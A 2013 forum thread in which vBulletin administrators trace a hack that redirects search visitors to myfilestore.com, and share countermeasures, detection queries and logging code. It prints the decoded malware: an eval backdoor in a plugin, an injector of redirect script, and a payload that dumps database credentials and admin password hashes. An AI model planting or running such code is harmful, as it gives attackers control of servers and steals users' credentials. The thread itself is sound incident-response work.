Old 15-04-2013   #1
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Vbulletin myfilestore hack - Find the traces and remove them

For our Myce members - This post is to inform fellow Vbulletin owners with information from a hack we suffered from. This should not have affected our users.

We have been working hard together with fellow forum owners in solving a redirection issue that seems to be infecting thousands of Vbulletin sites. Instead of giving you the usual advice, we have been able to trace back most of the works of this malware and provide some real working fixes.

Please link to this thread so it gets on top in Google and makes sure we help a lot of other Vbulletin owners!

Index
  1. What happens?
  2. How to find out if you are infected?
  3. What do they do?
  4. How do they get access to your admincp?
  5. What countermeasures can be taken?
  6. Remaining questions

What happens?

If people come from search engines like Google, Bing, Yahoo, Yandex, Rambler or Baidu they end up on another site than yours. They are redirected to any of these sites (please tell us when one is missing)
  • myfilestore.com
  • filestore72.info
  • file2store.info
  • url2short.info
  • filestore123.info
  • url123.info
  • dollarade.com

myfilestore.com and related sites

These websites appear to be affiliate sites that let's you download something. Most likely once the installation is done the 'hackers' will receive a fee or they try to infect people with malware. It's always a good idea to do additional virus scanning when you've ended up on that page. We've also submitted the domains to Google which will hopefully take measures.

How to find out your forum is infected?

Most likely your visitors will report that they are redirected to another site when trying to visit your site from search engines. They will likely note one of the sites in the list above.

To reproduce yourself:
  1. Open a private/incognito window in your browser or clear cache and cookies
  2. Go to either Google, Bing, Yahoo, Yandex, Rambler or Baidu
  3. Search for a term of which you know your site will appear in the search engine
  4. Click a result
  5. If nothing happens, it might be wise to try a couple of times to be sure you're not infected

Besides that, check your datastore:
  • If you're using a file based datastore then get it from /includes/datastore/datastore_cache.php
  • In the database, table datastore and field pluginslist

In either one, best to even check both, search for strange code, think about long strings containing random characters, hashes or anything else unusual. The code injected to our site was this:

PHP Code:
$o 'b5e20b9bb877342f907b745fdd1f42bd';
$vbg '<LONG LINE OF ENCODED CRAP WHICH WE REMOVED FOR READABILITY>;
$xml = '
$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*.+H8@%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
$xml2 '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;9oTh@SYC!5rf)U1{nz#dkmGau^yp$<|M%DW-qI"xA';
$as '#c#'.substr($vbg3651);
$vbt preg_replace($asstrtr($vbg$xml$xml2), 'css'); 
The criminals also seem to inject code in plugins. It's a bit hard to find it and they appear to use different methods. It's very important however that you find this, with their code they have your site under full control.

Plugin code we found so far

By going through all hooks in misc.php we found that in this file there are only hooks that start with 'misc'.

We went in the plugin manager and searched for plugins that hook into anything start with 'misc'. In our installation there were only six. By manually opening them we found out that in the plugin 'vBSEO Misc Start' that hooks into 'misc_start' the following code was inserted:

PHP Code:
if(defined('VBSEO_ENABLED')) { 
vbseo_complete_sec('misc_start'); 

if(isset(
$_REQUEST['e']) && $_REQUEST['do'] == 'config') { 
eval(
$_REQUEST['e']); 
die(); 

This means that our server is wide open to hackers. The eval() command can be used to excute any PHP code on our servers and this code could be fed to eval() by adding some <?php ?> wrapped code to the 'e' parameter.

While we're not sure if we closed the loophole completely. This code is the first thing to disable. You can remove the last 4 lines completely or just comment out the eval line. We added a nice surprise for the hackers if they are calling it again.

An another plugin, reported by Scott. We don't immediately understand why they add this as the code doesn't seem to be harmfull.

PHP Code:
if(preg_match("/image|do=|dateline/i",$_ENV['REQUEST_URI']) || isset($_ENV['QUERY_STRING']) || isset($_POST)) { } else { ob_start(); ob_implicit_flush(1); flush(); ob_flush(); 
The code they add to the plugins/datastore was decoded and looked like this:

PHP Code:
$q='ini_set';
if(
function_exists($q))
{
    
$q('display_errors',0);
    
$q('log_errors',0);
}

if(isset(
$_POST[$o]))
    eval(
base64_decode(str_rot13($_POST[$o])));

$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$s=@parse_url($_SERVER['HTTP_REFERER']);
$t=@$s['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$t);
$h=@$_SERVER['HTTP_HOST'];
$p=@COOKIE_PREFIX;
$a=@THIS_SCRIPT==='misc';
$c=$p.'lastvisit';
$n=$p.'lang_id';
$y=@ord(FILE_VERSION)>51;
$z=empty($_SERVER['HTTP_X_MOZ']);
$j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;g=js"></script>';

if(empty(
$_COOKIE[$n]))
{
    if(
$a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c])))
    {
        if(
$t==$h)
        {
            if(
$z)
                
setcookie($n,'en',time()+36000);
            
$m=substr(md5($h),0,8);
            print(
"document.location='h**p://my****store.com/download.php?id={$m}'");
        }
        exit;
    }
    if((!
$u) && $r)
    {
        if(
$y)
        {
            
$GLOBALS['template_hook']['headinclude_javascript'].=$j;
        }
        else
        {
            
$GLOBALS['style']['css'].=$j;
        }
    }

This means we found out what the redirect caused. We recovered by saving some settings again which made the datastore to refresh and it was gone.

Besides the changes to the datastore and the plugins, we also found out that they are posting long strings of encoded data to sites. This looks like this:

PHP Code:
$_POST['<SOME KIND OF HASH>'] = 'MJAbolOgMQHbWmWwLmV3Mw ... < ENCODED CRAP ONE AGAIN > ... yzZGWuAmL1BQp5MQt5Z2D4Z2R2Z2MxMQSuWl.....'
And here's the decoded code, don't get scared! We decoded it using

PHP Code:
echo(base64_decode(str_rot13('encrypted string'))); 
(credits ovk)


PHP Code:
echo md5('3c4eb64c8db01a5ab261e18fdc16089e');$oa=array('ecnt'=>0);function weh($en$es$ef$el){global $oa;$oa['e'][]=array($en,$es,$ef,$el);};set_error_handler('weh');ini_set('log_errors',0);ob_start();
gtadmndtas();
 
function 
gtadmndtas()
{
    
$out $bf $h '';
    
$ag = array();
     
    if(
is_file('includes/config.php'))
    {
        include(
'includes/config.php');
        if(
is_file('vbseo/resources/xml/config.xml'))
        {
            
$bf = @file_get_contents('vbseo/resources/xml/config.xml');
        }
    }
    elseif(
is_file('config.php'))
    {
        include(
'config.php');
        if(
is_file('../vbseo/resources/xml/config.xml'))
        {
            
$bf = @file_get_contents('../vbseo/resources/xml/config.xml');
        }
    }
    else
    {
        echo 
"BD error: config not found\n";
        return;
    }
     
    if(!empty(
$bf))
    {
        
$a strpos($bf'<name>VBSEO_ADMIN_PASSWORD</name>');
        if(
$a !== false)
        {
            
$a strpos($bf'<value>'$a 10);
            
$b strpos($bf'</value>'$a 7);
            if((
$a !== false) && ($b !== false))
            {
                
$h substr($bf$a 7$b $a 7);
            }
        }
    }
     
    
$out .= "---------------=-=pong1234321=-=--------------------------<br>\n";
    if(!empty(
$h))
    {
        
$out .= "VBSH: {$h}<br>\n";
    }
    
$out .= "ACP: {$config['Misc']['admincpdir']}<br>\n";
    
$out .= "dbtype: {$config['Database']['dbtype']}<br>\n";
    
$out .= "servername: {$config['MasterServer']['servername']}<br>\n";
    
$out .= "port: {$config['MasterServer']['port']}<br>\n";
    
$out .= "dbname: {$config['Database']['dbname']}<br>\n";
    
$out .= "username: {$config['MasterServer']['username']}<br>\n";
    
$out .= "password: {$config['MasterServer']['password']}<br>\n";
    
$out .= "tableprefix: {$config['Database']['tableprefix']}<br>\n";
    
$out .= "technicalemail: {$config['Database']['technicalemail']}<br>\n";
    
$out .= "-----------------------------------------<br>\n";
     
    echo 
$out;
    
$out '';
    
$gt "{$config['Database']['tableprefix']}usergroup";
    
$mt "{$config['Database']['tableprefix']}user";
     
    
$mysql_conn mysql_connect("{$config['MasterServer']['servername']}:{$config['MasterServer']['port']}"$config['MasterServer']['username'], $config['MasterServer']['password']);
    if(!
$mysql_conn)
    {
        echo 
"Mysql login failed!";
        return;
    }
     
    if(!
mysql_select_db($config['Database']['dbname'], $mysql_conn))
    {
        echo 
"Mysql database selection failed!";
        return;
    }
 
    
$sql "SELECT usergroupid FROM $gt WHERE adminpermissions>1";
    
$res mysql_query($sql);
    if(!
$res)
    {
        
$err mysql_error($mysql_conn);
        echo 
"Mysql query failed: $err";
        return;
    }
     
    while(
$row mysql_fetch_assoc($res))
    {
        
$ag[] = intval($row['usergroupid']);
    }
     
    
$ags implode(',',$ag);
    
$sql "SELECT userid,username,email,usergroupid,password,salt FROM $mt WHERE usergroupid IN ($ags)";
    
$res mysql_query($sql);
    if(!
$res)
    {
        
$err mysql_error($mysql_conn);
        echo 
"Mysql query failed: $err";
        return;
    }
     
    while(
$row mysql_fetch_assoc($res))
    {
        
$data implode("|:|"$row);
        
$data htmlentities($data);
        
$out .= "$data<br>\n";
    }
     
    
$out .= "-----------------------------------------\n<br>\n";
    echo 
$out;
    
$out '';
}
$out=ob_get_contents();ob_end_clean();$oa['d'][0]=$out;$out=serialize($oa);$out=gzcompress($out,9);$out=base64_encode($out);$out=str_replace('=','',$out);$out=str_rot13($out);echo($out);echo md5('117ae4783ac97ecf30b2419315518cd1');exit; 
Or pastebin for increased readbililty: http://pastebin.com/cCd72uZN

What do they do?

We think this is it how they do it:
  1. Get access to the admin panel (see below)
  2. Add data to a plugin, both a method to open your entire server to them and the code that inserts javascript on your site and causes the redirection
  3. With this in place, they POST another encrypted string that executes code that reveals passwords etc and allows them to compromise whatever they want

How do they get access to your admin panel

This part is still a bit guessing but we found some strange URLs being called on our server, we expect that they have more methods, but we can confirm at least one strange thing.

They request URLs like this:

PHP Code:
adminhash = ************************* 
128.2.142.104 160971 - [17/Apr/2013:16:19:43 +0200"POST /?vbseourl%00=admincp/plugin.php" 
Which seem to make use of an arbitrary PHP file inclusion issue:

http://www.madirish.net/397


What countermeasures can be taken?

The good news, A LOT!

Credits to ovk

Add this at the top of your yourforum/misc.php

PHP Code:
if($_GET['g']=='js') die; 
This doesn't stop the actual hack, but stops the redirects. This prevents the javascript to execute. It's possible that they change variable names, so check your injected code if it's ['g'] or another character.

Credits to Liggy
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the users account, a confirmation via Instant Messenger would be best as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines
    PHP Code:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start'); 
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.

To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.

Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.

Credits to Liggy

Also add this code at the beginning of yourforum/vbseo.php

PHP Code:
if (strpos($_SERVER["QUERY_STRING"],'%00')) 
    die; 
[EDIT by Liggy]You may also send them some greetings like we did [/EDIT]


Remaining questions
  • Did they get access to the admincp using an exploit/backdoor?
  • Did they get access by compromising an admin account, and how?
  • Are our counter measures succesful or will we face another attempt?

Bonus material

If you kept reading, well done! You might want to add some logging to see what's going on and help in our quest to find out everything. Here's some code that you can add to yourforum/includes/config.php

PHP Code:
function DumpToLog($DoPost=false)
{
    
$logfile=@fopen('{Enter your path here}' date('Ymd') . '.log',"a");
    if (
$logfile)
    {
        if (
$_COOKIE["bbuserid"])
            
$bbuser=$_COOKIE["bbuserid"];
        else
            
$bbuser='-';
        if (isset(
$_SERVER["REMOTE_USER"]))
            
$ruser=$_SERVER["REMOTE_USER"];
        else
            
$ruser='-';

        
fprintf(
          
$logfile,'%s %s %s [%s] "%s %s"%s',
          
$_SERVER['REMOTE_ADDR'],$bbuser,$ruser,date('d/M/Y:H:i:s O'),$_SERVER["REQUEST_METHOD"],$_SERVER["REQUEST_URI"],"\n"
          
);


        if (
$DoPost && ($_SERVER["REQUEST_METHOD"]=="POST"))
        {
            echo 
"POST data:\n";
            foreach(
$_POST as $postvar=>$postvalue)
                
fprintf($logfile,"%s = %s\n",$postvar,$postvalue);
        }

        
fclose($logfile);
    }
}

DumpToLog(false); 
You can change the call from DumpToLog(false) to DumpToLog(true) to also log the POST variables. However this can lead to very big log sizes and add sensitive data like passwords or password hashes to the log file.

(Once again, credits to Liggy!)

Please, if you're reading this and can provide us with additional information, REGISTER and post additional information, also questions are welcome.

Your questions might give us an additional path to trace down the origin of this hack.
__________________
Need some help ? Please use our search function first

Last edited by Liggy; 20-04-2013 at 10:52.
DoMiN8ToR is offline   Reply With Quote
Old 15-04-2013   #2
ovk
New Member
 
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
Hello,

thank you for this thread, my site was also hit by this trojan and for the last few days I've been (unsuccessfully so far) trying to find the root of the attack.
While on my board I didn't find the modified misc_start plugin, I did find a different version of the encrypted code you posted in the pluginlist datastore record.
Consisting of a few assigns and a preg_replace, I don't really understand how that code becomes an eval() but it does seem to cause the redirect by adding a <script> tag in the site's header pointing to misc.php?v=413&g=js that outputs a document.location statement.
Of course, removing that code from the datastore is very simple by opening and saving any plugin but after some time (about 12 hours) the code comes back, that means that my site has a yet undetected backdoor that is used to inject the code in the datastore.

Until I find a permanent solution, I have stopped the redirections by adding this line of code on the first line of misc.php:
PHP Code:
if(($_GET['g']=='js') die; 
This way, even if the <script> is injected, it doesn't do anything.
ovk is offline   Reply With Quote
Old 15-04-2013   #3
Administrator & Reviewer
 
Wombler's Avatar
 
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
I'm just glad we've got such experts on the case as that looks very complicated to trace.


Wombler
__________________
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Forum Help: Forum Rules, Myce Help Centre
If you find these forums useful then: Register Here
DVDFab/ImgBurn: Choosing the correct Layer Break Position in ImgBurn
DVDFab: BDMV-REC Supported Burners
Reviews: Ideal DVD Copy, Magic DVD Copier, DVDFab DVD Copy v9

Wombler is offline   Reply With Quote
Old 15-04-2013   #4
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Hi ovk, thanks for your report. Maybe we can hook up and work together on getting this down? I would also like to write a script to detect it, but we already thought it might be useless as the infection seems to change a lot. All we can do now is manual checks. But if we can find something that is common it could help.

If you like, send me a PM with your e-mail address and we can hook up (or your skypename if you use it...)
__________________
Need some help ? Please use our search function first
DoMiN8ToR is offline   Reply With Quote
Old 16-04-2013   #5
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
We were hit again, the code return and our trap wasn't used. This will be another day of investigations...
__________________
Need some help ? Please use our search function first
DoMiN8ToR is offline   Reply With Quote
Old 16-04-2013   #6
ovk
New Member
 
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
Hi

my e-mail addy is the one I used to create my profile here.
I'll keep you posted with updates here nevertheless.
For now I have removed the code from the datastore and started sniffing http requests using tcpdump.
Hopefully when the malicious code gets re-inserted in the datastore I'll have some detail on how it was done in the tcpdump logs.

I strongly believe it has something to do with vbseo even if they deny it on their forums.
ovk is offline   Reply With Quote
Old 16-04-2013   #7
Senior Administrator
 
Liggy's Avatar
 
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Yesterday it helped to rebuild the datastore by applying user banning options again, today this does not help. So it also seems to be hidden somewhere else.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline   Reply With Quote
Old 16-04-2013   #8
Senior Administrator & Reviewer
 
Seán's Avatar
 
Join Date: Jun 2002
Location: Republic of Ireland (North West)
Posts: 11,180
I wonder if a scheduled process was planted. For example, if the time stamp of the modified php file always ends in let's say ':19' every time it gets hit again, this would indicate a possible scheduled process sitting on our server reinfecting the file.

Wish you all the best solving this.
Seán is offline   Reply With Quote
Old 16-04-2013   #9
Administrator & Reviewer
 
Wombler's Avatar
 
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
Yeah it sounds like a real pain this one.

Time consuming too.


Wombler
__________________
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Forum Help: Forum Rules, Myce Help Centre
If you find these forums useful then: Register Here
DVDFab/ImgBurn: Choosing the correct Layer Break Position in ImgBurn
DVDFab: BDMV-REC Supported Burners
Reviews: Ideal DVD Copy, Magic DVD Copier, DVDFab DVD Copy v9

Wombler is offline   Reply With Quote
Old 16-04-2013   #10
Senior Administrator
 
Liggy's Avatar
 
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Found that crap in the pluginlist entry in table datastore too. Looking at the details around this code, it should have come from vBSEO hook location cache_template / title vBSEO Cache Templates, but looking at it in the admin panel, it only contained the standard
PHP Code:
if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('cache_templates'); 
Saving that one unmodified, removed it from the table. Next step was saving the current user banning settings which re-created the datastore cache and also removed it from the datastore_cache.php file - let's wait how long it takes to come back this time.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline   Reply With Quote
Old 16-04-2013   #11
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
@Liggy, in the database, before the hashes they insert, there was also a lot of whitespace. I thought maybe they want to hide the code somewhere in a plugin, so if you look at it in the admincp you don't see it in the input box because you would need to scroll a lot. But I couldn't find any trace of this
__________________
Need some help ? Please use our search function first
DoMiN8ToR is offline   Reply With Quote
Old 16-04-2013   #12
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
We also found two images in /images/misc trying to confirm if this is ours or was uploaded by the hackers.
__________________
Need some help ? Please use our search function first
DoMiN8ToR is offline   Reply With Quote
Old 16-04-2013   #13
Senior Administrator
 
Liggy's Avatar
 
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
These images were mine. I was trying something, but don't remember what.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline   Reply With Quote
Old 16-04-2013   #14
Management
 
DoMiN8ToR's Avatar
 
Join Date: Jul 1999
Location: Myce HQ
Posts: 14,593
Liggy just found out that they had access to an admin account. Someone who didn't login for a long time. Probably because that would go unnoticed for a while...
__________________
Need some help ? Please use our search function first
DoMiN8ToR is offline   Reply With Quote
Old 16-04-2013   #15
Senior Administrator
 
Liggy's Avatar
 
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
I wrote a small routine to generate a custom logfile and added the code to config.php so it's executed every time a forum routine is called.
PHP Code:
function DumpToLog()
{
    
$logfile=@fopen('{Enter your path here}' date('Ymd') . '.log',"a");
    if (
$logfile)
    {
        if (
$_COOKIE["bbuserid"])
            
$bbuser=$_COOKIE["bbuserid"];
        else
            
$bbuser='-';
        if (isset(
$_SERVER["REMOTE_USER"]))
            
$ruser=$_SERVER["REMOTE_USER"];
        else
            
$ruser='-';

        
fprintf(
          
$logfile,'%s %s %s [%s] "%s %s"%s',
          
$_SERVER['REMOTE_ADDR'],$bbuser,$ruser,date('d/M/Y:H:i:s O'),$_SERVER["REQUEST_METHOD"],$_SERVER["REQUEST_URI"],"\n"
          
);
        
fclose($logfile);
    }       
}

DumpToLog(); 
It doesn't verify the password for the user - but for logging this kind of problems, that should be sufficient. Before adding the code, make sure to add your logging path and that it provides enough disk space. If you comment the DumpToLog() here and add it to different (suspicious) routines, you can reduce the log size, but potentially miss calls you should have logged.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline   Reply With Quote
Old 16-04-2013   #16
ovk
New Member
 
Join Date: Apr 2013
Location: Craiova, RO
Posts: 18
I confirm that the bot that inserted this code into my datastore also had access to one of my administrator's account. It still doesn't explain alot of things and I strongly believe that it's not the root of our problem.

Still investigating
ovk is offline   Reply With Quote
Old 16-04-2013   #17
Senior Administrator & Reviewer
 
Arachne's Avatar
 
Join Date: Nov 2005
Location: Tabby Towers, West of England
Posts: 33,938
Looks like a right little smegger with all the re-infections, nice job with the investigating guys
__________________
RIP Baz 8/1997-11/2013 - love ya buddy

How to delete your upper and lower filters : How to check/enable DMA by Womble

Click here to join MyCE.com and be part of our friendly community!

Smile...people will wonder what you're up to
Arachne is offline   Reply With Quote
Old 16-04-2013   #18
Administrator & Reviewer
 
Wombler's Avatar
 
Join Date: Apr 2005
Location: Northern Ireland
Posts: 12,770
Quote:
Originally Posted by DoMiN8ToR View Post
Liggy just found out that they had access to an admin account. Someone who didn't login for a long time. Probably because that would go unnoticed for a while...
That's not great news but at least Liggy found it and has taken action.


Wombler
__________________
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Forum Help: Forum Rules, Myce Help Centre
If you find these forums useful then: Register Here
DVDFab/ImgBurn: Choosing the correct Layer Break Position in ImgBurn
DVDFab: BDMV-REC Supported Burners
Reviews: Ideal DVD Copy, Magic DVD Copier, DVDFab DVD Copy v9

Wombler is offline   Reply With Quote
Old 17-04-2013   #19
New Member
 
Join Date: Apr 2013
Location: North Carolina
Posts: 11
I google and found this thread, I joined just to post in this thread. The crapy "myfilestore" hack has been giving me a fit for over a year now and no one knows how or what to do. If you google it you will see vBulletin says its not them, vBseo says its not them. I don't know but I sure as hell hope you guys figure it out.

Like I said its been messing with my boards for over a year and its costing me money just from the drop of daily visitors to my board that come through a search engine.

I am at my ends with this hack that. All I have been doing every damn day is disabling and enabling a produce and the hack is gone for a few hours.


My bad is I stepped out of line on your board, that was not my intent, I am just so frustrated with this hack.
br54910 is offline   Reply With Quote
Old 17-04-2013   #20
New Member
 
Join Date: Apr 2013
Location: North Carolina
Posts: 11
FYI WHM/cPanel can't be part of this since my servers have no control panel installed at all.

Also I ran across this just a few minuets ago and just thought I would through it out here.

http://www.vbseo.com/blogs/rafael-be...w-prevent-361/
br54910 is offline   Reply With Quote
Old 17-04-2013   #21
MyCE Rookie
 
Join Date: Apr 2013
Posts: 24
Like br54910 - I found this via Google and so far is the most up to date info I've found. I'm not running register_globals (and I would assume club.myce.com isn't either) and none of the other threads of info have helped. I haven't bothered with vBulletin/vBSEO support due to the reception others are getting.

The issue has only started happening on my forum in the last couple of weeks. I'm running vB4.2.0PL3, and was running vBSEO3.6.0, now running .1.

Haven't found any odd additions in any of templates/plugins/etc, any odd files or anything either.

I'm currently going through my httpd server logs - Will post up if I find anything.
stubbed is offline   Reply With Quote
Old 17-04-2013   #22
MyCE Resident
 
cholla's Avatar
 
Join Date: Jul 2007
Location: Amarillo ,Texas
Posts: 8,162
I don't know if this will helpbut here goes. I'm posting from my laptop because Avast on my desktop found what it thought was VIRUS when I clicked on the thread.
I have AVG on the laptop & it didn't.
The desktop works on all other threads on the forum.
This one now gives me the :
Quote:
Internet Explorer cannot display the webpage
This is the URL I got when this happened:
http://club.myce.com/f20/vbulletin-m...e-them-332219/
These are the two Avast windows:
Name:  CM01.jpg
Views: 3876
Size:  32.6 KB

Name:  CM02.jpg
Views: 3883
Size:  31.7 KB

This is all the information I know I have right now ,
If there is any more I can give you let me know.
__________________
cholla pronounced ˈchȯi-yə click on cholla to hear
cholla is offline   Reply With Quote
Old 17-04-2013   #23
MyCE Rookie
 
Join Date: Apr 2013
Posts: 24
^-- That's because "myfilestore" is a known spyware site. My users running the same software reported the error, thats when I stumbled onto the issue.

Doesn't help in fixing it though
stubbed is offline   Reply With Quote
Old 17-04-2013   #24
Senior Administrator
 
Liggy's Avatar
 
Join Date: Apr 2002
Location: Monkey Island
Posts: 8,734
Quote:
Originally Posted by br54910 View Post
I am at my ends with this hack that. All I have been doing every damn day is disabling and enabling a produce and the hack is gone for a few hours.
Quote:
Originally Posted by stubbed View Post
Haven't found any odd additions in any of templates/plugins/etc, any odd files or anything either.
My idea on trying to fix it is the following:
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the users account, a confirmation via Instant Messenger would be best as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines
    PHP Code:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start'); 
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.
To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.
Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.

As a final counter measurement you can modify file misc.php and include the following commands at the beginning, right after the error_reporting command:
PHP Code:
if($_GET['g']=='js')
    die; 
This code will not prevent you from being hacked but prevents the current exploit from redirecting your visitors.

Quote:
Originally Posted by br54910 View Post
My bad is I stepped out of line on your board, that was not my intent, I am just so frustrated with this hack.
I didn't see anything out of line. Your comments were very welcome.
__________________
You need to flash or dump your NEC DVD burner firmwares on your Mac, Windows, DOS or Linux machine? Just try Binflash.
Visit Liggy's and Dee's Optiarc and NEC firmware and tools page for all kind of information about NEC and Optiarc drives.


Unrequested PM about drive problems will not be answered!
Liggy is offline   Reply With Quote
Old 17-04-2013   #25
MyCE Rookie
 
Join Date: Apr 2013
Posts: 24
Quote:
Originally Posted by Liggy View Post
My idea on trying to fix it is the following:
In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST.
I've done the following for both of these and turned up zero dodgy entries:

Code:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

Quote:
Originally Posted by Liggy View Post
As a final counter measurement you can modify file misc.php and include the following commands at the beginning, right after the error_reporting command:
PHP Code:
if($_GET['g']=='js')
    die; 
This code will not prevent you from being hacked but prevents the current exploit from redirecting your visitors.
I've just been doing a "cat access.log.1 | grep g=js > /home/hacked.log" and checking this out. I reckon that this is as a result of the hack, not what causes the hack.

There are constant entries in the access.log to that url, but with a valid referrer entry, however they stop around the time I got to work and reset the datastore, then they started roughly 12 hours later. I'm going going through my last weeks worth of logs to see where the first entry is, then work back from that.

I'm bashing my head against a wall also. I'm running nginx+php-fpm, all of the threads I've seen are people saying it's something to do with folder/file permissions and someone running a dodgy .gif file? I can't understand that all. My configuration only passes *.php files to php-fpm, so that completely voids that argument.

I've also not found any dodgy code, anywhere. I haven't "fixed" anything except upgrading from 3.6.0 to 3.6.1. This probably reset all of the vBSEO plugins, which if there was eval code in, is obviously gone.

<-- Also a pretty pissed off vBulletin/vBSEO owner/admin right now.
stubbed is offline   Reply With Quote
Reply


Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Search Result redirects to myfilestore.com mockingbird Community Talk , Bug Reports & Site Feedback 4 15-04-2013 15:57
Brands and Media Manufacturers and the relationships between them lordsifl Blank Media 2 16-01-2006 17:56
what is a letterbox and how to remove them? shenmue Newbie Forum 5 11-09-2005 10:09
Too much virtual drives (don't know how to remove them) Seb_Lz General Software 2 10-01-2005 23:42
Older Philips cdr type where to find them? macarena Blank Media 8 09-05-2003 04:11


All times are GMT +2. The time now is 08:43.
Top